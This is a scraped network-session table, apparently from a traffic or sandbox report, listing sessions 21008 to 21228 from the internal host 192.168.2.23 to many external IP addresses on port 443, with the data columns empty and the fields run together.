                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21008192.168.2.233499657.195.216.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21009192.168.2.235937427.183.154.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21010192.168.2.2336696122.141.160.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21011192.168.2.233537694.218.109.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21012192.168.2.2346216119.190.190.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21013192.168.2.2347416124.107.18.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21014192.168.2.234491678.254.80.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21015192.168.2.235094636.6.3.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21016192.168.2.235728083.202.228.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21017192.168.2.2336498132.20.182.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21018192.168.2.233772491.51.218.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21019192.168.2.236012498.58.33.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21020192.168.2.2342608216.69.181.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21021192.168.2.2356368210.153.242.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21022192.168.2.2336446164.139.23.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21023192.168.2.2332984166.86.254.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21024192.168.2.23343442.125.50.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21025192.168.2.234520812.115.182.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21026192.168.2.2332974167.194.233.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21027192.168.2.23328149.43.22.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21028192.168.2.2360478150.37.132.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21029192.168.2.2359858132.151.197.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21030192.168.2.2344906117.217.107.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21031192.168.2.235321647.50.207.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21032192.168.2.234255817.100.155.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21033192.168.2.23369848.220.74.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21034192.168.2.2341994217.103.77.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21035192.168.2.234965294.93.17.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21036192.168.2.2341998192.140.57.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21037192.168.2.2349518211.133.91.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21038192.168.2.234448088.184.68.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21039192.168.2.2338446166.253.99.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21040192.168.2.2341868145.10.238.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21041192.168.2.2336178182.170.179.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21042192.168.2.2359828130.24.194.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21043192.168.2.2347942152.162.114.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21044192.168.2.235824437.108.239.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21045192.168.2.235333035.203.84.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21046192.168.2.2355200157.24.193.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21047192.168.2.2348254137.84.219.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21048192.168.2.2350340189.237.238.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21049192.168.2.2356162194.11.254.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21050192.168.2.2348072211.107.185.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21051192.168.2.2356252172.225.171.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21052192.168.2.235771668.110.190.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21053192.168.2.2348212186.129.171.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21054192.168.2.2344622166.102.118.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21055192.168.2.2344838112.190.197.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21056192.168.2.235999257.177.214.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21057192.168.2.2347232104.27.245.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21058192.168.2.2334894114.67.20.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21059192.168.2.2348734117.95.237.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21060192.168.2.2343964121.122.82.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21061192.168.2.2348544166.30.78.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21062192.168.2.235302231.103.86.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21063192.168.2.2351008104.114.199.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21064192.168.2.2345544129.241.159.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21065192.168.2.2348914197.253.186.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21066192.168.2.234591243.39.135.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21067192.168.2.233782692.34.237.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21068192.168.2.2346990102.190.35.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21069192.168.2.2352774221.220.181.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21070192.168.2.2351704204.135.139.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21071192.168.2.235610450.221.72.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21072192.168.2.23341948.215.24.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21073192.168.2.2341826210.218.43.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21074192.168.2.233848475.189.27.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21075192.168.2.2350848141.149.95.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21076192.168.2.235198273.17.139.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21077192.168.2.2337150164.50.224.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21078192.168.2.2339642176.9.190.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21079192.168.2.235857457.107.223.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21080192.168.2.235409891.16.166.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21081192.168.2.2338992155.197.241.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21082192.168.2.235873892.31.244.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21083192.168.2.2354412213.52.32.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21084192.168.2.234418663.105.32.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21085192.168.2.2339548207.92.43.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21086192.168.2.2357782132.155.17.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21087192.168.2.2339546110.81.1.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21088192.168.2.2360814134.26.38.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21089192.168.2.2354802168.31.31.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21090192.168.2.2342554153.175.109.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21091192.168.2.2358014221.7.76.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21092192.168.2.2358080180.112.106.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21093192.168.2.233876036.178.97.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21094192.168.2.2356298178.242.47.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21095192.168.2.2337434206.199.147.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21096192.168.2.234548674.12.77.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21097192.168.2.2359672190.92.218.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21098192.168.2.2353594143.200.165.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21099192.168.2.2356302128.69.160.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21100192.168.2.234205674.177.188.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21101192.168.2.2355806193.48.111.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21102192.168.2.233711277.255.92.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21103192.168.2.234163023.189.143.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21104192.168.2.234669481.2.6.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21105192.168.2.2347794182.226.204.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21106192.168.2.233607620.60.255.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21107192.168.2.2345664152.59.246.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21108192.168.2.2351604218.92.7.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21109192.168.2.2341966113.174.163.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21110192.168.2.2354324100.63.82.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21111192.168.2.233715292.47.222.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21112192.168.2.2350738170.40.29.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21113192.168.2.2347292185.23.124.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21114192.168.2.2342112121.129.20.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21115192.168.2.2342230156.223.175.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21116192.168.2.2359384133.68.90.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21117192.168.2.2355174129.119.185.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21118192.168.2.2343422111.208.17.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21119192.168.2.234774451.200.92.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21120192.168.2.2334190194.56.47.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21121192.168.2.2342280216.129.204.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21122192.168.2.2350958206.206.61.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21123192.168.2.235991648.24.141.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21124192.168.2.2355872169.109.211.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21125192.168.2.235964677.138.227.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21126192.168.2.235059442.169.87.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21127192.168.2.2336186140.95.243.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21128192.168.2.2349834172.65.127.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21129192.168.2.2354186169.200.236.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21130192.168.2.2335396143.116.238.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21131192.168.2.2333352111.127.70.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21132192.168.2.2333590162.85.102.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21133192.168.2.2339142117.144.30.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21134192.168.2.2342544113.126.159.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21135192.168.2.233309084.22.249.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21136192.168.2.2356206137.252.205.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21137192.168.2.235909643.147.57.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21138192.168.2.2347486117.154.20.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21139192.168.2.233688414.200.183.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21140192.168.2.2356368123.4.24.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21141192.168.2.2340414131.180.43.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21142192.168.2.2337452132.186.104.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21143192.168.2.235719624.213.134.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21144192.168.2.2342394202.203.59.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21145192.168.2.2357062105.25.146.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21146192.168.2.2358730181.6.13.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21147192.168.2.2335022122.162.119.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21148192.168.2.2339010170.81.117.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21149192.168.2.2341208194.13.183.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21150192.168.2.234762867.84.243.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21151192.168.2.234567896.135.90.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21152192.168.2.2347404197.152.129.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21153192.168.2.2340460164.85.50.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21154192.168.2.2343510216.61.158.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21155192.168.2.2340958211.194.63.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21156192.168.2.2353716173.77.194.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21157192.168.2.2343004209.47.183.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21158192.168.2.2356412118.48.151.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21159192.168.2.235162649.229.158.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21160192.168.2.2359636125.253.216.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21161192.168.2.2355072117.218.38.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21162192.168.2.23577905.62.206.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21163192.168.2.235810497.87.219.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21164192.168.2.2338656156.242.37.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21165192.168.2.235265234.213.22.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21166192.168.2.2335896107.6.122.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21167192.168.2.234377690.87.3.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21168192.168.2.2343862181.77.196.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21169192.168.2.2340646187.86.10.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21170192.168.2.235339260.81.149.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21171192.168.2.233799059.179.72.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21172192.168.2.2337918163.82.74.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21173192.168.2.2349854140.236.104.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21174192.168.2.2345798206.86.25.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21175192.168.2.2357232206.12.67.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21176192.168.2.2355564112.158.101.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21177192.168.2.233521467.157.205.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21178192.168.2.235856635.241.118.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21179192.168.2.2348888202.157.129.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21180192.168.2.233920694.181.252.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21181192.168.2.235316013.81.37.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21182192.168.2.235506650.77.124.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21183192.168.2.2353444125.242.193.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21184192.168.2.2335440167.131.242.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21185192.168.2.235276074.151.22.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21186192.168.2.234128899.193.125.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21187192.168.2.2360648119.253.47.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21188192.168.2.235010257.35.174.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21189192.168.2.2359004100.164.91.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21190192.168.2.2346442207.31.242.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21191192.168.2.2346472203.100.243.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21192192.168.2.2360904152.213.129.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21193192.168.2.234405290.48.81.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21194192.168.2.2334506131.191.96.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21195192.168.2.235037223.46.46.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21196192.168.2.2344824128.226.61.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21197192.168.2.2343266189.243.117.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21198192.168.2.234736019.110.162.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21199192.168.2.2348826210.118.65.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21200192.168.2.2353038149.133.112.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21201192.168.2.234753667.237.68.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21202192.168.2.2341164124.24.142.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21203192.168.2.234592027.159.163.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21204192.168.2.233417069.197.49.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21205192.168.2.236060448.190.186.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21206192.168.2.233947281.151.87.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21207192.168.2.2340360179.20.249.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21208192.168.2.235277889.251.131.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21209192.168.2.233998299.27.47.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21210192.168.2.233335051.184.56.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21211192.168.2.2353190112.86.247.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21212192.168.2.234926880.84.10.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21213192.168.2.2342220205.128.37.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21214192.168.2.2337362182.162.69.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21215192.168.2.234825836.174.213.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21216192.168.2.2352378197.136.162.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21217192.168.2.2344160114.0.161.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21218192.168.2.2335750125.70.113.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21219192.168.2.2360716135.209.81.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21220192.168.2.2360430182.8.83.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21221192.168.2.2340688135.158.110.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21222192.168.2.2352092210.114.171.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21223192.168.2.235671619.39.69.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21224192.168.2.2333006162.214.146.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21225192.168.2.2350794101.6.72.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21226192.168.2.2344418137.236.245.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21227192.168.2.235199819.157.93.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21228192.168.2.2359228165.206.219.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
